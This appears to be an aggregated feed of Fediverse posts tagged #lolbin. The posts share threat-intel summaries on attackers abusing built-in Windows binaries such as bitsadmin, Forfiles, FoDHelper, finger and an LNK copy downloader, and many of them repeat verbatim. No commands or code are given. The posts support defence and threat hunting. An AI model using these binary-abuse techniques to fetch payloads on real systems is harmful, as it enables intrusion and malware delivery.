home.social

#lolbin — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #lolbin, aggregated by home.social.

  1. her living of the land techniques have inspired generations of hackers with #lolbin attacks as well
    #infosec

  2. RE: infosec.exchange/@netresec/115

    Here’s a good example on why you should have network egress filtering on your network. Nobody uses the finger protocol any more. But the binary still exists in Windows! And if you don’t block outbound port 79/tcp your users are at risk #cybersecurity #LOLBIN

  3. There's a new acronym out there, LOTS. Its the SaaS version of LOL (Living Of the Land). It stands for Living Off Trusted Sites. I've only seen it in a few blog posts, but wanted to put this out there.
    #LOTS #LOLbin #Infosec

  4. Cisco Talos discloses a new Vietnamese financially-motivated actor dubbed CoralRaider, targeting victims in several Asian and Southeast Asian countries since at least 2023. They focus on stealing victims’ credentials, financial data, and social media accounts, including business and advertisement accounts. Known malware used are a QuasarRAT variant called RotBot, and XClient stealer. TTPs include abusing a legitimate service to host the C2 configuration file and uncommon living-off-the-land binaries (LoLBins), including Windows Forfiles.exe and FoDHelper.exe. IOC provided. 🔗 blog.talosintelligence.com/cor

    #CoralRaider #Vietnam #cybercrime #threatintel #IOC #QuasarRAT #RotBot #XClient #LoLBin

  5. Cisco Talos discloses a new Vietnamese financially-motivated actor dubbed CoralRaider, targeting victims in several Asian and Southeast Asian countries since at least 2023. They focus on stealing victims’ credentials, financial data, and social media accounts, including business and advertisement accounts. Known malware used are a QuasarRAT variant called RotBot, and XClient stealer. TTPs include abusing a legitimate service to host the C2 configuration file and uncommon living-off-the-land binaries (LoLBins), including Windows Forfiles.exe and FoDHelper.exe. IOC provided. 🔗 blog.talosintelligence.com/cor

    #CoralRaider #Vietnam #cybercrime #threatintel #IOC #QuasarRAT #RotBot #XClient #LoLBin

  6. Cisco Talos discloses a new Vietnamese financially-motivated actor dubbed CoralRaider, targeting victims in several Asian and Southeast Asian countries since at least 2023. They focus on stealing victims’ credentials, financial data, and social media accounts, including business and advertisement accounts. Known malware used are a QuasarRAT variant called RotBot, and XClient stealer. TTPs include abusing a legitimate service to host the C2 configuration file and uncommon living-off-the-land binaries (LoLBins), including Windows Forfiles.exe and FoDHelper.exe. IOC provided. 🔗 blog.talosintelligence.com/cor

    #CoralRaider #Vietnam #cybercrime #threatintel #IOC #QuasarRAT #RotBot #XClient #LoLBin

  7. Cisco Talos discloses a new Vietnamese financially-motivated actor dubbed CoralRaider, targeting victims in several Asian and Southeast Asian countries since at least 2023. They focus on stealing victims’ credentials, financial data, and social media accounts, including business and advertisement accounts. Known malware used are a QuasarRAT variant called RotBot, and XClient stealer. TTPs include abusing a legitimate service to host the C2 configuration file and uncommon living-off-the-land binaries (LoLBins), including Windows Forfiles.exe and FoDHelper.exe. IOC provided. 🔗 blog.talosintelligence.com/cor

    #CoralRaider #Vietnam #cybercrime #threatintel #IOC #QuasarRAT #RotBot #XClient #LoLBin

  8. Cisco Talos discloses a new Vietnamese financially-motivated actor dubbed CoralRaider, targeting victims in several Asian and Southeast Asian countries since at least 2023. They focus on stealing victims’ credentials, financial data, and social media accounts, including business and advertisement accounts. Known malware used are a QuasarRAT variant called RotBot, and XClient stealer. TTPs include abusing a legitimate service to host the C2 configuration file and uncommon living-off-the-land binaries (LoLBins), including Windows Forfiles.exe and FoDHelper.exe. IOC provided. 🔗 blog.talosintelligence.com/cor

    #CoralRaider #Vietnam #cybercrime #threatintel #IOC #QuasarRAT #RotBot #XClient #LoLBin

  9. Happy Friday everyone!

    The Threat Hunters at Group-IB share their tactics and techniques, this time when they are hunting for suspicious or malicious activity related to adversaries leveraging the living-off-the-land binary (#LOLBIN) wmic.exe, or Windows Management Instrumentation, or WMI. What I really like about this, aside from some experts sharing their knowledge, is that they not only touch on the execution but share other ways to hunt for follow on activity, for example, what activity looks like when WMI is the parent process. These are always a great read! Enjoy and Happy Hunting!

    Hunting Rituals #4: Threat hunting for execution via Windows Management Instrumentation
    group-ib.com/blog/hunting-ritu

    #CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

  10. LNK file with "Copy" command used as simple downloader for #Xworm #RAT and #AsyncRAT The source argument of copy command is the network location in this case, which effectively means that the remote BAT file is downloaded to the victim computer.

    LNK files are often used for malicious purposes. For example, they can be the delivered as email attachments and can run malicious PowerShell commands. However, this one is demonstration of KISS principle - simple and stupid (or actually smart) usage of essential utility.

    Ref: app.any.run/tasks/1cbca783-832

    #malware #malwareanalysis #lolbin #sandbox #AnyRun

  11. Another week, another newsletter - catch up on the week's infosec news here:

    opalsec.substack.com/p/soc-gou

    Researchers have found that nearly two years on, 2 in 3 installs of #Apache #Superset are still using default Flask Secret Keys - a configuration flaw which would allow an attacker to forge session cookies and access said servers with full administrative privileges.

    #Kritec is a commodity #skimmer found installed on compromised #Magecart sites, with its code heavily obfuscated and customised to match the site's aesthetic in order to con users out of credit card details.

    #FIN7 look to be popping instances of the #Veeam backup software that are unpatched for a recent vulnerability; a revised #ViperSoftX #infostealer now targets #1password and #keepass password vaults, and #TA505 deliver a new infostealer through a #GoogleAds campaign

    #LockBit & #CL0P ransomware affiliates have been abusing a month-old vulnerability in the #PaperCut print management software to drop ransomware. With the cat out of the bag, security researchers have decided now is a great time to drop a PoC exploit on Github - I mean, why not let the skiddies get in on the action too, right?

    The #blueteam have some great research worth reading on #Smishing via #AWS; detections for #SliverC2 and different implementations of #PsExec, as well as #Sigma integration for #SentinelOne and a #KQL hack for monitoring LOLDrivers.

    Have a great week ahead folks, I hope this newsletter proves helpful!

    opalsec.substack.com/p/soc-gou

    #infosec #cyber #news #newsletter #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #affiliate #dfir #soc #threatintel #threatintelligence #threathunting #detection #threatdetection #detectionengineering #flask #python #fraud #malvertising #clop #PoC #exploit #securityresearch #LOLBAS #LOLBIN #BYOVD

  12. Another week, another newsletter - catch up on the week's infosec news here:

    opalsec.substack.com/p/soc-gou

    Researchers have found that nearly two years on, 2 in 3 installs of #Apache #Superset are still using default Flask Secret Keys - a configuration flaw which would allow an attacker to forge session cookies and access said servers with full administrative privileges.

    #Kritec is a commodity #skimmer found installed on compromised #Magecart sites, with its code heavily obfuscated and customised to match the site's aesthetic in order to con users out of credit card details.

    #FIN7 look to be popping instances of the #Veeam backup software that are unpatched for a recent vulnerability; a revised #ViperSoftX #infostealer now targets #1password and #keepass password vaults, and #TA505 deliver a new infostealer through a #GoogleAds campaign

    #LockBit & #CL0P ransomware affiliates have been abusing a month-old vulnerability in the #PaperCut print management software to drop ransomware. With the cat out of the bag, security researchers have decided now is a great time to drop a PoC exploit on Github - I mean, why not let the skiddies get in on the action too, right?

    The #blueteam have some great research worth reading on #Smishing via #AWS; detections for #SliverC2 and different implementations of #PsExec, as well as #Sigma integration for #SentinelOne and a #KQL hack for monitoring LOLDrivers.

    Have a great week ahead folks, I hope this newsletter proves helpful!

    opalsec.substack.com/p/soc-gou

    #infosec #cyber #news #newsletter #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #affiliate #dfir #soc #threatintel #threatintelligence #threathunting #detection #threatdetection #detectionengineering #flask #python #fraud #malvertising #clop #PoC #exploit #securityresearch #LOLBAS #LOLBIN #BYOVD

  13. Another week, another newsletter - catch up on the week's infosec news here:

    opalsec.substack.com/p/soc-gou

    Researchers have found that nearly two years on, 2 in 3 installs of #Apache #Superset are still using default Flask Secret Keys - a configuration flaw which would allow an attacker to forge session cookies and access said servers with full administrative privileges.

    #Kritec is a commodity #skimmer found installed on compromised #Magecart sites, with its code heavily obfuscated and customised to match the site's aesthetic in order to con users out of credit card details.

    #FIN7 look to be popping instances of the #Veeam backup software that are unpatched for a recent vulnerability; a revised #ViperSoftX #infostealer now targets #1password and #keepass password vaults, and #TA505 deliver a new infostealer through a #GoogleAds campaign

    #LockBit & #CL0P ransomware affiliates have been abusing a month-old vulnerability in the #PaperCut print management software to drop ransomware. With the cat out of the bag, security researchers have decided now is a great time to drop a PoC exploit on Github - I mean, why not let the skiddies get in on the action too, right?

    The #blueteam have some great research worth reading on #Smishing via #AWS; detections for #SliverC2 and different implementations of #PsExec, as well as #Sigma integration for #SentinelOne and a #KQL hack for monitoring LOLDrivers.

    Have a great week ahead folks, I hope this newsletter proves helpful!

    opalsec.substack.com/p/soc-gou

    #infosec #cyber #news #newsletter #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #affiliate #dfir #soc #threatintel #threatintelligence #threathunting #detection #threatdetection #detectionengineering #flask #python #fraud #malvertising #clop #PoC #exploit #securityresearch #LOLBAS #LOLBIN #BYOVD

  14. Another week, another newsletter - catch up on the week's infosec news here:

    opalsec.substack.com/p/soc-gou

    Researchers have found that nearly two years on, 2 in 3 installs of #Apache #Superset are still using default Flask Secret Keys - a configuration flaw which would allow an attacker to forge session cookies and access said servers with full administrative privileges.

    #Kritec is a commodity #skimmer found installed on compromised #Magecart sites, with its code heavily obfuscated and customised to match the site's aesthetic in order to con users out of credit card details.

    #FIN7 look to be popping instances of the #Veeam backup software that are unpatched for a recent vulnerability; a revised #ViperSoftX #infostealer now targets #1password and #keepass password vaults, and #TA505 deliver a new infostealer through a #GoogleAds campaign

    #LockBit & #CL0P ransomware affiliates have been abusing a month-old vulnerability in the #PaperCut print management software to drop ransomware. With the cat out of the bag, security researchers have decided now is a great time to drop a PoC exploit on Github - I mean, why not let the skiddies get in on the action too, right?

    The #blueteam have some great research worth reading on #Smishing via #AWS; detections for #SliverC2 and different implementations of #PsExec, as well as #Sigma integration for #SentinelOne and a #KQL hack for monitoring LOLDrivers.

    Have a great week ahead folks, I hope this newsletter proves helpful!

    opalsec.substack.com/p/soc-gou

    #infosec #cyber #news #newsletter #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #affiliate #dfir #soc #threatintel #threatintelligence #threathunting #detection #threatdetection #detectionengineering #flask #python #fraud #malvertising #clop #PoC #exploit #securityresearch #LOLBAS #LOLBIN #BYOVD

  15. Another week, another newsletter - catch up on the week's infosec news here:

    opalsec.substack.com/p/soc-gou

    Researchers have found that nearly two years on, 2 in 3 installs of #Apache #Superset are still using default Flask Secret Keys - a configuration flaw which would allow an attacker to forge session cookies and access said servers with full administrative privileges.

    #Kritec is a commodity #skimmer found installed on compromised #Magecart sites, with its code heavily obfuscated and customised to match the site's aesthetic in order to con users out of credit card details.

    #FIN7 look to be popping instances of the #Veeam backup software that are unpatched for a recent vulnerability; a revised #ViperSoftX #infostealer now targets #1password and #keepass password vaults, and #TA505 deliver a new infostealer through a #GoogleAds campaign

    #LockBit & #CL0P ransomware affiliates have been abusing a month-old vulnerability in the #PaperCut print management software to drop ransomware. With the cat out of the bag, security researchers have decided now is a great time to drop a PoC exploit on Github - I mean, why not let the skiddies get in on the action too, right?

    The #blueteam have some great research worth reading on #Smishing via #AWS; detections for #SliverC2 and different implementations of #PsExec, as well as #Sigma integration for #SentinelOne and a #KQL hack for monitoring LOLDrivers.

    Have a great week ahead folks, I hope this newsletter proves helpful!

    opalsec.substack.com/p/soc-gou

    #infosec #cyber #news #newsletter #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #affiliate #dfir #soc #threatintel #threatintelligence #threathunting #detection #threatdetection #detectionengineering #flask #python #fraud #malvertising #clop #PoC #exploit #securityresearch #LOLBAS #LOLBIN #BYOVD

  16. The #SophosMDR team also discovered cases where threat actors targeting #PaperCut were abusing the bitsadmin.exe Windows application to download payloads. #BITSAdmin is commonly abused by active adversaries as a "living off the land binary" or #LOLbin, handy for accomplishing the task of downloading payloads.

    The tools exploited in the attacks have included what we refer to as “dual-use agents,” used both legitimately by IT staff and maliciously by attackers. At the time of writing, Sophos has observed the abuse of #AnyDesk, #Atera, #Synchro, #TightVNC, #NetSupport, and #DWAgent remote management tools across multiple campaigns.

    4/6

  17. The #SophosMDR team also discovered cases where threat actors targeting #PaperCut were abusing the bitsadmin.exe Windows application to download payloads. #BITSAdmin is commonly abused by active adversaries as a "living off the land binary" or #LOLbin, handy for accomplishing the task of downloading payloads.

    The tools exploited in the attacks have included what we refer to as “dual-use agents,” used both legitimately by IT staff and maliciously by attackers. At the time of writing, Sophos has observed the abuse of #AnyDesk, #Atera, #Synchro, #TightVNC, #NetSupport, and #DWAgent remote management tools across multiple campaigns.

    4/6

  18. The #SophosMDR team also discovered cases where threat actors targeting #PaperCut were abusing the bitsadmin.exe Windows application to download payloads. #BITSAdmin is commonly abused by active adversaries as a "living off the land binary" or #LOLbin, handy for accomplishing the task of downloading payloads.

    The tools exploited in the attacks have included what we refer to as “dual-use agents,” used both legitimately by IT staff and maliciously by attackers. At the time of writing, Sophos has observed the abuse of #AnyDesk, #Atera, #Synchro, #TightVNC, #NetSupport, and #DWAgent remote management tools across multiple campaigns.

    4/6

  19. The #SophosMDR team also discovered cases where threat actors targeting #PaperCut were abusing the bitsadmin.exe Windows application to download payloads. #BITSAdmin is commonly abused by active adversaries as a "living off the land binary" or #LOLbin, handy for accomplishing the task of downloading payloads.

    The tools exploited in the attacks have included what we refer to as “dual-use agents,” used both legitimately by IT staff and maliciously by attackers. At the time of writing, Sophos has observed the abuse of #AnyDesk, #Atera, #Synchro, #TightVNC, #NetSupport, and #DWAgent remote management tools across multiple campaigns.

    4/6

  20. The #SophosMDR team also discovered cases where threat actors targeting #PaperCut were abusing the bitsadmin.exe Windows application to download payloads. #BITSAdmin is commonly abused by active adversaries as a "living off the land binary" or #LOLbin, handy for accomplishing the task of downloading payloads.

    The tools exploited in the attacks have included what we refer to as “dual-use agents,” used both legitimately by IT staff and maliciously by attackers. At the time of writing, Sophos has observed the abuse of #AnyDesk, #Atera, #Synchro, #TightVNC, #NetSupport, and #DWAgent remote management tools across multiple campaigns.

    4/6

  21. I've just started looking at the #XCyclopedia as a source of inspiration - it's has really handy enrichment from a variety of external #LOLBin repositories to see potential misuse examples. It has even started enumerating COM objects which is cool.